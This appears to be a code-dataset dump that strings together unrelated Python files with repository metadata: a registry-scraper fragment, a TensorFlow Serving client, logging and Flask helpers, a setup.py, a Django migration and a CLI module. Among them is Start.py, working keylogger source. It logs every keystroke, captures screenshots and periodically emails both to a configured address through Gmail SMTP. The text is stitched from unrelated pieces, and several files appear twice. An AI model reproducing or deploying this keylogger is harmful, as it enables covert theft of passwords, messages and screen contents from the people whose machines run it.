fk_corp_id_code=corp_id_code,
cite_type=u"extract",
cite_link=url)
try:
relation["relation_type"] = [mem["position"]]
except KeyError:
pass
log.msg("Added relation from Extract: {}".format(relation), level=log.DEBUG)
results.append(relation)
#s = u"".join([tb.text for tb in dir_lines])
#log.msg(unicode(s), level=log.DEBUG)
else:
log.msg("No directors found.", level=log.DEBUG)
# Extract ownership info
own_lines = pdfparse.get_pdf_lines('partners',boxes,soup,isEnglishDocument,False)
if(own_lines is not None):
log.msg("Found partners block, printing", level=log.DEBUG)
text = [tb for tb in own_lines]
owners = pdfparse.parse_owners(text)
for o in owners:
try:
pers = Person(personal_code=o["id_code"])
except KeyError:
continue
try:
pers["name"] = o["name"]
except KeyError:
pass
try:
pers["nationality"] = o["nationality"]
except KeyError:
pass
relation = PersonCorpRelation(person=pers,
fk_corp_id_code=corp_id_code,
cite_type=u"extract",
cite_link=url)
relation["relation_type"] = [u"პარტნიორი"]
try:
relation["share"] = o["share"]
except KeyError:
pass
log.msg("Added relation from Extract: {}".format(relation), level=log.DEBUG)
results.append(relation)
else:
log.msg("No owners found.", level=log.DEBUG)
return results
# Each statement also has status docs which come along with it
# This function extracts information from those docs.
# It appears these docs are duplicative so they probably don't
# need to be scraped.
#def parse_stmnt_status_pdf(self, response):
# pass
# There are a lot of tables where the header
# is in column 0, and the info we want is in column 1.
# So this just searches for a td matching the header
# string and then returns its next sibling.
def _get_header_sib(self, soup, header):
regx = re.compile(header)
res = soup.find("td",text=regx)
if res is not None:
next_col = res.find_next_sibling("td")
return next_col
def _person_from_statement_cell(self, cell):
pers = Person()
for s in cell.stripped_strings:
parts = s.split(u"(პ/ნ:")
if len(parts) == 2:
pers['name'] = parts[0]
pers['personal_code'] = parts[1][:-1]
else:
pers['address'] = s
return pers
def parse(self, response):
pass
| 30,325 | 2,119 | 23 |
09acc4605fd5b38508b61e04b86a6d3de0f7cc15 | 1,474 | py | Python | docs/client.py | kmader/MMdnn | f62a33a7d6834680537693c7fdc7e90e1b2382ef | [
"MIT"
] | 3,442 | 2017-11-20T08:39:51.000Z | 2019-05-06T10:51:19.000Z | docs/client.py | kmader/MMdnn | f62a33a7d6834680537693c7fdc7e90e1b2382ef | [
"MIT"
] | 430 | 2017-11-29T04:21:48.000Z | 2019-05-06T05:37:37.000Z | docs/client.py | kmader/MMdnn | f62a33a7d6834680537693c7fdc7e90e1b2382ef | [
"MIT"
] | 683 | 2017-11-20T08:50:34.000Z | 2019-05-04T04:25:14.000Z | '''
Send JPEG image to tensorflow_model_server loaded with GAN model.
Hint: the code has been compiled together with TensorFlow serving
and not locally. The client is called in the TensorFlow Docker container
'''
from __future__ import print_function
# Communication to TensorFlow server via gRPC
from grpc.beta import implementations
import tensorflow as tf
# TensorFlow serving stuff to send messages
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
# Command line arguments
tf.app.flags.DEFINE_string('server', 'localhost:9000',
'PredictionService host:port')
tf.app.flags.DEFINE_string('image', '', 'path to image in JPEG format')
FLAGS = tf.app.flags.FLAGS
if __name__ == '__main__':
tf.app.run()
| 33.5 | 108 | 0.755088 | '''
Send JPEG image to tensorflow_model_server loaded with GAN model.
Hint: the code has been compiled together with TensorFlow serving
and not locally. The client is called in the TensorFlow Docker container
'''
from __future__ import print_function
# Communication to TensorFlow server via gRPC
from grpc.beta import implementations
import tensorflow as tf
# TensorFlow serving stuff to send messages
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
# Command line arguments
tf.app.flags.DEFINE_string('server', 'localhost:9000',
'PredictionService host:port')
tf.app.flags.DEFINE_string('image', '', 'path to image in JPEG format')
FLAGS = tf.app.flags.FLAGS
def main(_):
host, port = FLAGS.server.split(':')
channel = implementations.insecure_channel(host, int(port))
stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# Send request
image = tf.gfile.FastGFile(FLAGS.image, 'rb').read()
request = predict_pb2.PredictRequest()
request.model_spec.name = 'tensorflow-serving'
request.model_spec.signature_name = tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
request.inputs['image'].CopyFrom(tf.contrib.util.make_tensor_proto(image))
#request.inputs['input'].CopyFrom()
result = stub.Predict(request, 10.0) # 10 secs timeout
print(result)
if __name__ == '__main__':
tf.app.run()
| 651 | 0 | 23 |
57a796c67682624626cfd8021fec8667928490a1 | 1,863 | py | Python | setup_logging.py | mnooel/BUSADM_795_UtilizationPrediction | 65b7b5f7902133fdf93ffa0c15362c7c5cf20196 | [
"MIT"
] | null | null | null | setup_logging.py | mnooel/BUSADM_795_UtilizationPrediction | 65b7b5f7902133fdf93ffa0c15362c7c5cf20196 | [
"MIT"
] | null | null | null | setup_logging.py | mnooel/BUSADM_795_UtilizationPrediction | 65b7b5f7902133fdf93ffa0c15362c7c5cf20196 | [
"MIT"
] | null | null | null | # setup_logging.py
import logging
import logging.config
from settings import LOGS_DIR
class CustomFormatter(logging.Formatter):
"""Logging Formatter to ad colors and count warnings / errors"""
pink = "\x1b[35m"
blue = "\033[96m"
yellow = "\033[93m"
red = "\x1b[31;21m"
bold_red = "\033[41m"
reset = "\x1b[0m"
format = "%(asctime)s | %(name)s | %(levelname)s | %(message)s"
FORMATS = {
logging.DEBUG: pink + format + reset,
logging.INFO: blue + format + reset,
logging.WARNING: yellow + format + reset,
logging.ERROR: red + format + reset,
logging.CRITICAL: bold_red + format + reset
}
def setup_logger(logger: logging.Logger, log_file_name: str) -> None:
"""
function that setups a standard logger
:rtype: None
:param logger: logger object initiated at the beginning of the file
:param log_file_name: name to save the log as
:return: None only modifications are made to the logger object
"""
logger.setLevel(logging.DEBUG)
# create handlers
console_handler = logging.StreamHandler()
file_handler = logging.FileHandler(LOGS_DIR + '/' + log_file_name)
# set levels of the handlers
console_handler.setLevel(level=logging.DEBUG)
file_handler.setLevel(level=logging.INFO)
# create formats and set them to the handlers
file_format = logging.Formatter('%(asctime)s | %(name)s | %(levelname)s | %(message)s')
console_handler.setFormatter(CustomFormatter())
file_handler.setFormatter(file_format)
# add handlers to the logger
logger.addHandler(console_handler)
logger.addHandler(file_handler)
| 30.540984 | 91 | 0.677939 | # setup_logging.py
import logging
import logging.config
from settings import LOGS_DIR
class CustomFormatter(logging.Formatter):
"""Logging Formatter to ad colors and count warnings / errors"""
pink = "\x1b[35m"
blue = "\033[96m"
yellow = "\033[93m"
red = "\x1b[31;21m"
bold_red = "\033[41m"
reset = "\x1b[0m"
format = "%(asctime)s | %(name)s | %(levelname)s | %(message)s"
FORMATS = {
logging.DEBUG: pink + format + reset,
logging.INFO: blue + format + reset,
logging.WARNING: yellow + format + reset,
logging.ERROR: red + format + reset,
logging.CRITICAL: bold_red + format + reset
}
def format(self, record: logging.LogRecord) -> str:
log_format = self.FORMATS.get(record.levelno)
formatter = logging.Formatter(log_format)
return formatter.format(record)
def setup_logger(logger: logging.Logger, log_file_name: str) -> None:
"""
function that setups a standard logger
:rtype: None
:param logger: logger object initiated at the beginning of the file
:param log_file_name: name to save the log as
:return: None only modifications are made to the logger object
"""
logger.setLevel(logging.DEBUG)
# create handlers
console_handler = logging.StreamHandler()
file_handler = logging.FileHandler(LOGS_DIR + '/' + log_file_name)
# set levels of the handlers
console_handler.setLevel(level=logging.DEBUG)
file_handler.setLevel(level=logging.INFO)
# create formats and set them to the handlers
file_format = logging.Formatter('%(asctime)s | %(name)s | %(levelname)s | %(message)s')
console_handler.setFormatter(CustomFormatter())
file_handler.setFormatter(file_format)
# add handlers to the logger
logger.addHandler(console_handler)
logger.addHandler(file_handler)
| 174 | 0 | 27 |
35d3af359c0efd1434ebe45e1cddcebf6507ca75 | 211 | py | Python | app.py | behrad-kzm/ClubHouseFollowers | b22c5cd2d53aa72506247726a86d4d027d267091 | [
"MIT"
] | 1 | 2021-05-07T13:07:47.000Z | 2021-05-07T13:07:47.000Z | app.py | behrad-kzm/ClubHouseFollowers | b22c5cd2d53aa72506247726a86d4d027d267091 | [
"MIT"
] | 2 | 2021-05-07T12:58:34.000Z | 2021-06-12T22:17:07.000Z | app.py | behrad-kzm/ClubHouseFollowers | b22c5cd2d53aa72506247726a86d4d027d267091 | [
"MIT"
] | 2 | 2021-04-22T08:20:28.000Z | 2022-01-11T01:13:29.000Z | from flask import Flask
from web.BaseRouter import BaseRouter
app = Flask(__name__)
base_url = '/'
router = BaseRouter(base_url)
router.register_flask_blueprints(app)
if __name__ == '__main__':
app.run()
| 17.583333 | 37 | 0.753555 | from flask import Flask
from web.BaseRouter import BaseRouter
app = Flask(__name__)
base_url = '/'
router = BaseRouter(base_url)
router.register_flask_blueprints(app)
if __name__ == '__main__':
app.run()
| 0 | 0 | 0 |
feb38174f1700808131d73f0b240b8072e5ef95a | 748 | py | Python | setup.py | gsoft-inc/github-secret-finder | 07e85fbc84773dfe9e921d2e7a3c0372cb936177 | [
"Apache-2.0"
] | 4 | 2019-10-22T20:03:41.000Z | 2020-11-18T18:00:56.000Z | setup.py | mlefebvre/github-secret-finder | 07e85fbc84773dfe9e921d2e7a3c0372cb936177 | [
"Apache-2.0"
] | null | null | null | setup.py | mlefebvre/github-secret-finder | 07e85fbc84773dfe9e921d2e7a3c0372cb936177 | [
"Apache-2.0"
] | 1 | 2021-03-30T16:28:57.000Z | 2021-03-30T16:28:57.000Z | from setuptools import setup, find_packages
setup(
name='github_secret_finder',
version='2.0.0',
description='Script to monitor commits from Github users and organizations for secrets.',
url='https://github.com/gsoft-inc/github-secret-finder',
author='Mathieu Gascon-Lefebvre',
author_email='mathieuglefebvre@gmail.com',
license='Apache',
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
package_data={'github_secret_finder': ['data/*']},
install_requires=[
'unidiff',
'requests',
'detect_secrets',
'sqlitedict'
],
entry_points={
'console_scripts': ['github-secret-finder = github_secret_finder.main:main'],
},
)
| 29.92 | 93 | 0.663102 | from setuptools import setup, find_packages
setup(
name='github_secret_finder',
version='2.0.0',
description='Script to monitor commits from Github users and organizations for secrets.',
url='https://github.com/gsoft-inc/github-secret-finder',
author='Mathieu Gascon-Lefebvre',
author_email='mathieuglefebvre@gmail.com',
license='Apache',
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
package_data={'github_secret_finder': ['data/*']},
install_requires=[
'unidiff',
'requests',
'detect_secrets',
'sqlitedict'
],
entry_points={
'console_scripts': ['github-secret-finder = github_secret_finder.main:main'],
},
)
| 0 | 0 | 0 |
308df90572ef430a57e853178c42a774fc34567b | 284 | py | Python | blog/migrations/0003_delete_postthum.py | jinseopim/kkp | 609c05358bb76d14ce6796f4273a7867a494ce14 | [
"MIT"
] | 1 | 2020-11-07T02:27:46.000Z | 2020-11-07T02:27:46.000Z | blog/migrations/0003_delete_postthum.py | jinseopim/kkp | 609c05358bb76d14ce6796f4273a7867a494ce14 | [
"MIT"
] | null | null | null | blog/migrations/0003_delete_postthum.py | jinseopim/kkp | 609c05358bb76d14ce6796f4273a7867a494ce14 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-11-01 02:59
from django.db import migrations
| 16.705882 | 47 | 0.588028 | # Generated by Django 3.1.2 on 2020-11-01 02:59
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_postthum'),
]
operations = [
migrations.DeleteModel(
name='PostThum',
),
]
| 0 | 178 | 23 |
5a2275f8ed7adc271398e4f82c8f878f8d5aa6e7 | 3,728 | py | Python | Start.py | Glitchhy/Simple-Keylogger | 3682517e90ef651c1d54ee9d29fcf512e1655b97 | [
"MIT"
] | 9 | 2020-08-14T12:08:59.000Z | 2022-02-22T02:58:32.000Z | Start.py | Glitchhy/Simple-Keylogger | 3682517e90ef651c1d54ee9d29fcf512e1655b97 | [
"MIT"
] | 1 | 2019-12-29T07:06:50.000Z | 2019-12-29T08:59:51.000Z | Start.py | Glitchhy/Simple-Keylogger | 3682517e90ef651c1d54ee9d29fcf512e1655b97 | [
"MIT"
] | 3 | 2020-08-03T17:32:53.000Z | 2020-09-04T16:36:48.000Z | import pynput
from pynput.keyboard import Key, Listener
import pyautogui
import yagmail
import os.path
from datetime import datetime
import time
import sys
import os
from sys import platform as _platform
#Defining color values for later
G = '\033[32m' #Green
R = '\033[31m' # Red
C = '\033[36m' # Cyan
W = '\033[0m' # White
#Needs testing but it SHOULD work
if _platform == "linux" or _platform =="linux2" or _platform =="darwin":
os.system('clear')
elif _platform == "win32" or _platform == "win64":
os.system('cls')
count = 0
keys = []
try:
print(G + "I am alive..." + W)
#Special characters are included here.
with Listener(on_press=on_press, on_release=on_release) as listener:
#Call Methods, Repeats every 1 minute
while True:
time.sleep(100)
save_screenshot()
send_emal()
listener.join()
except KeyboardInterrupt:
print('\n' + R + "Program Killed X_X" + W)
| 31.327731 | 141 | 0.450644 | import pynput
from pynput.keyboard import Key, Listener
import pyautogui
import yagmail
import os.path
from datetime import datetime
import time
import sys
import os
from sys import platform as _platform
#Defining color values for later
G = '\033[32m' #Green
R = '\033[31m' # Red
C = '\033[36m' # Cyan
W = '\033[0m' # White
#Needs testing but it SHOULD work
if _platform == "linux" or _platform =="linux2" or _platform =="darwin":
os.system('clear')
elif _platform == "win32" or _platform == "win64":
os.system('cls')
count = 0
keys = []
try:
print(G + "I am alive..." + W)
def on_press(key):
global keys, count
keys.append(key)
count += 1
print("{0} pressed".format(key))
if count >= 10:
count = 0
write_file(keys)
keys = []
#Special characters are included here.
def write_file(keys):
with open("Log.txt", "a") as f: #Saves the Logging data
for key in keys:
k = str(key).replace("'","")
if k.find("space") > 0:
f.write(str(' '))
elif k.find("caps_lock") > 0:
f.write(str("<CAPS_LOCK>"))
elif k.find("enter") > 0:
f.write(str("\n"))
elif k.find("<96>") > -1:
f.write(str("0"))
elif k.find("<97>") > -1:
f.write(str("1"))
elif k.find("<98>") > -1:
f.write(str("2"))
elif k.find("<99>") > -1:
f.write(str("3"))
elif k.find("<100>") > -1:
f.write(str("4"))
elif k.find("<101>") > -1:
f.write(str("5"))
elif k.find("<102>") > -1:
f.write(str("6"))
elif k.find("<103>") > -1:
f.write(str("7"))
elif k.find("<104>") > -1:
f.write(str("8"))
elif k.find("<105>") > -1:
f.write(str("9"))
elif k.find("Key") == -1:
f.write(k)
def on_release(key):
if key == Key.esc:
return False
def save_screenshot():
myScreenshot = pyautogui.screenshot()
myScreenshot.save(r'Evidence.png') #Saves a Screenshot
#Check if it works
def send_emal():
receiver_emails = ['from_recipient@outlook.com'] #Enther the email where you want to be sent the keylog data
subject = "Keylog Data" + datetime.now().strftime("%d-%m-%Y %H-%M-%S")
yag=yagmail.SMTP("youemail@gmail.com","you_password") #Enter the Gmail credentials used by the account that will send you the email.
#This is the body of the email that will be sent to you
contents = [
' <b> <font color="#FF1493" size="10"> LAST MINUTE PWNING 👾 </font> </b>',
"Log.txt",
"Evidence.png"
]
yag.send(receiver_emails, subject, contents)
with Listener(on_press=on_press, on_release=on_release) as listener:
#Call Methods, Repeats every 1 minute
while True:
time.sleep(100)
save_screenshot()
send_emal()
listener.join()
except KeyboardInterrupt:
print('\n' + R + "Program Killed X_X" + W)
| 2,387 | 0 | 204 |
d70b66e55221141909a6df82d5a89e6e99db91b0 | 5,712 | py | Python | src/mbed_cloud/_backends/mds/models/endpoint.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 12 | 2017-12-28T11:18:43.000Z | 2020-10-04T12:11:15.000Z | src/mbed_cloud/_backends/mds/models/endpoint.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 50 | 2017-12-21T12:50:41.000Z | 2020-01-13T16:07:08.000Z | src/mbed_cloud/_backends/mds/models/endpoint.py | GQMai/mbed-cloud-sdk-python | 76ef009903415f37f69dcc5778be8f5fb14c08fe | [
"Apache-2.0"
] | 8 | 2018-04-25T17:47:29.000Z | 2019-08-29T06:38:27.000Z | # coding: utf-8
"""
Connect API
Pelion Device Management Connect API allows web applications to communicate with devices. You can subscribe to device resources and read/write values to them. Device Management Connect allows connectivity to devices by queueing requests and caching resource values.
OpenAPI spec version: 2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class Endpoint(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'q': 'bool',
'status': 'str',
'type': 'str'
}
attribute_map = {
'name': 'name',
'q': 'q',
'status': 'status',
'type': 'type'
}
def __init__(self, name=None, q=None, status=None, type=None):
"""
Endpoint - a model defined in Swagger
"""
self._name = name
self._q = q
self._status = status
self._type = type
self.discriminator = None
@property
def name(self):
"""
Gets the name of this Endpoint.
Unique Device Management Device ID representing the endpoint.
:return: The name of this Endpoint.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this Endpoint.
Unique Device Management Device ID representing the endpoint.
:param name: The name of this Endpoint.
:type: str
"""
self._name = name
@property
def q(self):
"""
Gets the q of this Endpoint.
Determines whether the device is in queue mode. <br/><br/><b>Queue mode</b><br/> When an endpoint is in queue mode, messages sent to the endpoint do not wake up the physical device. The messages are queued and delivered when the device wakes up and connects to Device Management Connect itself. You can also use the queue mode when the device is behind a NAT and cannot be reached directly by Device Management Connect.
:return: The q of this Endpoint.
:rtype: bool
"""
return self._q
@q.setter
def q(self, q):
"""
Sets the q of this Endpoint.
Determines whether the device is in queue mode. <br/><br/><b>Queue mode</b><br/> When an endpoint is in queue mode, messages sent to the endpoint do not wake up the physical device. The messages are queued and delivered when the device wakes up and connects to Device Management Connect itself. You can also use the queue mode when the device is behind a NAT and cannot be reached directly by Device Management Connect.
:param q: The q of this Endpoint.
:type: bool
"""
self._q = q
@property
def status(self):
"""
Gets the status of this Endpoint.
Deprecated and the value is always ACTIVE. Only used for API backwards compatibility reasons.
:return: The status of this Endpoint.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this Endpoint.
Deprecated and the value is always ACTIVE. Only used for API backwards compatibility reasons.
:param status: The status of this Endpoint.
:type: str
"""
self._status = status
@property
def type(self):
"""
Gets the type of this Endpoint.
Type of endpoint. (Free text)
:return: The type of this Endpoint.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""
Sets the type of this Endpoint.
Type of endpoint. (Free text)
:param type: The type of this Endpoint.
:type: str
"""
self._type = type
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, Endpoint):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 28.277228 | 428 | 0.572129 | # coding: utf-8
"""
Connect API
Pelion Device Management Connect API allows web applications to communicate with devices. You can subscribe to device resources and read/write values to them. Device Management Connect allows connectivity to devices by queueing requests and caching resource values.
OpenAPI spec version: 2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class Endpoint(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'q': 'bool',
'status': 'str',
'type': 'str'
}
attribute_map = {
'name': 'name',
'q': 'q',
'status': 'status',
'type': 'type'
}
def __init__(self, name=None, q=None, status=None, type=None):
"""
Endpoint - a model defined in Swagger
"""
self._name = name
self._q = q
self._status = status
self._type = type
self.discriminator = None
@property
def name(self):
"""
Gets the name of this Endpoint.
Unique Device Management Device ID representing the endpoint.
:return: The name of this Endpoint.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this Endpoint.
Unique Device Management Device ID representing the endpoint.
:param name: The name of this Endpoint.
:type: str
"""
self._name = name
@property
def q(self):
"""
Gets the q of this Endpoint.
Determines whether the device is in queue mode. <br/><br/><b>Queue mode</b><br/> When an endpoint is in queue mode, messages sent to the endpoint do not wake up the physical device. The messages are queued and delivered when the device wakes up and connects to Device Management Connect itself. You can also use the queue mode when the device is behind a NAT and cannot be reached directly by Device Management Connect.
:return: The q of this Endpoint.
:rtype: bool
"""
return self._q
@q.setter
def q(self, q):
"""
Sets the q of this Endpoint.
Determines whether the device is in queue mode. <br/><br/><b>Queue mode</b><br/> When an endpoint is in queue mode, messages sent to the endpoint do not wake up the physical device. The messages are queued and delivered when the device wakes up and connects to Device Management Connect itself. You can also use the queue mode when the device is behind a NAT and cannot be reached directly by Device Management Connect.
:param q: The q of this Endpoint.
:type: bool
"""
self._q = q
@property
def status(self):
"""
Gets the status of this Endpoint.
Deprecated and the value is always ACTIVE. Only used for API backwards compatibility reasons.
:return: The status of this Endpoint.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this Endpoint.
Deprecated and the value is always ACTIVE. Only used for API backwards compatibility reasons.
:param status: The status of this Endpoint.
:type: str
"""
self._status = status
@property
def type(self):
"""
Gets the type of this Endpoint.
Type of endpoint. (Free text)
:return: The type of this Endpoint.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""
Sets the type of this Endpoint.
Type of endpoint. (Free text)
:param type: The type of this Endpoint.
:type: str
"""
self._type = type
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, Endpoint):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 0 | 0 | 0 |
6ae1eab841865410c707419b131d26d4877665d7 | 1,377 | py | Python | scraperplot.py | TCR1990/SmartBuilding-master | fb3b373cabd442b7636b7e22c4e97853e9218d6f | [
"CC0-1.0"
] | 1 | 2020-05-18T14:14:18.000Z | 2020-05-18T14:14:18.000Z | scraperplot.py | nickmalleson/SmartBuilding-master | be644c28d920b30bf66a9fac1cf4f158a3129ab0 | [
"CC0-1.0"
] | 1 | 2020-02-04T17:26:19.000Z | 2020-02-04T17:26:19.000Z | scraperplot.py | nickmalleson/SmartBuilding-master | be644c28d920b30bf66a9fac1cf4f158a3129ab0 | [
"CC0-1.0"
] | 1 | 2020-01-20T10:01:55.000Z | 2020-01-20T10:01:55.000Z | # -*- coding: utf-8 -*-
"""
scraperplot.py
For retreiving and plotting data using the 'scraper.py' module.
Created on Wed Oct 30 15:11:00 2019
@author: Thomas Richards
"""
# import scraper.py
import scraper as scrp
# Run functions in get module
scraper = scrp.Scraper()
choices = input('What do you want to plot? Press enter for all. \n1. Managed '
'space data\n2. Sensor reading data \n>>')
if not choices:
chosen_space_numbers, chosen_space_names = \
scraper._choose_by_number(scraper.managed_space_info)
scraper.plot_managed_spaces(managed_spaces=chosen_space_numbers)
chosen_location_numbers, chosen_location_names = \
scraper._choose_by_number(scraper.sensor_location_info)
scraper.plot_sensor_reading_after(sensor_numbers=chosen_location_numbers)
elif choices:
choices = eval(choices)
if choices == 1:
chosen_space_numbers, chosen_space_names = \
scraper._choose_by_number(scraper.managed_space_info)
scraper.plot_managed_spaces(managed_spaces=chosen_space_numbers)
elif choices == 2:
chosen_location_numbers, chosen_location_names = \
scraper._choose_by_number(scraper.sensor_location_info)
scraper.plot_sensor_reading_after(sensor_numbers=\
chosen_location_numbers)
else:
print('Unknown input.') | 30.6 | 78 | 0.716776 | # -*- coding: utf-8 -*-
"""
scraperplot.py
For retreiving and plotting data using the 'scraper.py' module.
Created on Wed Oct 30 15:11:00 2019
@author: Thomas Richards
"""
# import scraper.py
import scraper as scrp
# Run functions in get module
scraper = scrp.Scraper()
choices = input('What do you want to plot? Press enter for all. \n1. Managed '
'space data\n2. Sensor reading data \n>>')
if not choices:
chosen_space_numbers, chosen_space_names = \
scraper._choose_by_number(scraper.managed_space_info)
scraper.plot_managed_spaces(managed_spaces=chosen_space_numbers)
chosen_location_numbers, chosen_location_names = \
scraper._choose_by_number(scraper.sensor_location_info)
scraper.plot_sensor_reading_after(sensor_numbers=chosen_location_numbers)
elif choices:
choices = eval(choices)
if choices == 1:
chosen_space_numbers, chosen_space_names = \
scraper._choose_by_number(scraper.managed_space_info)
scraper.plot_managed_spaces(managed_spaces=chosen_space_numbers)
elif choices == 2:
chosen_location_numbers, chosen_location_names = \
scraper._choose_by_number(scraper.sensor_location_info)
scraper.plot_sensor_reading_after(sensor_numbers=\
chosen_location_numbers)
else:
print('Unknown input.') | 0 | 0 | 0 |
7011b2ae0614609670b4e97d7fc81ec2fb09c3bb | 455 | py | Python | tests/test_numpy.py | python-pipe/hellp | 51fd7c9143ee8ce6392b9b877036ad4347ad29a5 | [
"MIT"
] | 123 | 2018-07-31T19:17:27.000Z | 2022-03-18T15:29:07.000Z | tests/test_numpy.py | python-pipe/hellp | 51fd7c9143ee8ce6392b9b877036ad4347ad29a5 | [
"MIT"
] | 11 | 2019-05-01T18:01:59.000Z | 2022-01-01T06:43:36.000Z | tests/test_numpy.py | python-pipe/hellp | 51fd7c9143ee8ce6392b9b877036ad4347ad29a5 | [
"MIT"
] | 4 | 2019-06-07T12:03:53.000Z | 2021-05-10T20:29:44.000Z | from sspipe import p, px
import numpy as np
| 16.851852 | 62 | 0.558242 | from sspipe import p, px
import numpy as np
def test_scalar_rhs():
assert np.int32(1) | p(lambda x: x + 1) | (px == 2)
def test_scalar_lhs():
assert 2 | px + np.int32(1)
def test_rhs():
assert np.array([1, 2]) | p(lambda x: x.sum()) | (px == 3)
def test_rhs_px():
assert np.array([1, 2]) | (px.sum() == 3)
def test_lhs():
assert 2 | p(np.log2) | (px == 1)
def test_lhs_px():
assert 2 | np.power(px, px + 1) | (px == 8)
| 267 | 0 | 138 |
c60241305672e3e339af5d324f08b5f8a9314443 | 20,971 | py | Python | remake/remake_cmd.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | null | null | null | remake/remake_cmd.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | 35 | 2020-12-22T11:36:46.000Z | 2021-12-03T15:49:41.000Z | remake/remake_cmd.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | null | null | null | import os
import sys
import argparse
import shutil
from logging import getLogger
from pathlib import Path
from time import sleep
from typing import List, Union, Optional, Sequence, Text
try:
# Might not be installed.
import ipdb as debug
except ImportError:
import pdb as debug
try:
import argcomplete
except ImportError:
argcomplete = None
from tabulate import tabulate
from remake.setup_logging import setup_stdout_logging
from remake.version import get_version
from remake.loader import load_remake
from remake.remake_exceptions import RemakeError
from remake.bcolors import bcolors
from remake.monitor import remake_curses_monitor
logger = getLogger(__name__)
| 35.725724 | 100 | 0.564351 | import os
import sys
import argparse
import shutil
from logging import getLogger
from pathlib import Path
from time import sleep
from typing import List, Union, Optional, Sequence, Text
try:
# Might not be installed.
import ipdb as debug
except ImportError:
import pdb as debug
try:
import argcomplete
except ImportError:
argcomplete = None
from tabulate import tabulate
from remake.setup_logging import setup_stdout_logging
from remake.version import get_version
from remake.loader import load_remake
from remake.remake_exceptions import RemakeError
from remake.bcolors import bcolors
from remake.monitor import remake_curses_monitor
logger = getLogger(__name__)
def log_error(ex_type, value, tb):
if isinstance(value, RemakeError):
logger.error(value)
else:
import traceback
traceback.print_exception(ex_type, value, tb)
def exception_info(ex_type, value, tb):
import traceback
traceback.print_exception(ex_type, value, tb)
debug.pm()
class Arg:
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def __call__(self):
return self.args, self.kwargs
def __str__(self):
return f'Arg({self.args}, {self.kwargs})'
def __repr__(self):
return str(self)
class MutuallyExclusiveGroup:
def __init__(self, *args):
self.args = args
def __str__(self):
argstr = '\n '.join(str(a) for a in self.args)
return f'MutuallyExclusiveGroup(\n {argstr})'
def __repr__(self):
return str(self)
def add_argset(parser, argset):
if isinstance(argset, MutuallyExclusiveGroup):
group = parser.add_mutually_exclusive_group()
for arg in argset.args:
group.add_argument(*arg.args, **arg.kwargs)
elif isinstance(argset, Arg):
parser.add_argument(*argset.args, **argset.kwargs)
else:
raise Exception(f'Unrecognized argset type {argset}')
class RemakeParser:
args = [
MutuallyExclusiveGroup(
Arg('--debug', '-D', help='Enable debug logging', action='store_true'),
Arg('--info', '-I', help='Enable info logging', action='store_true'),
Arg('--warning', '-W', help='Warning logging only', action='store_true'),
),
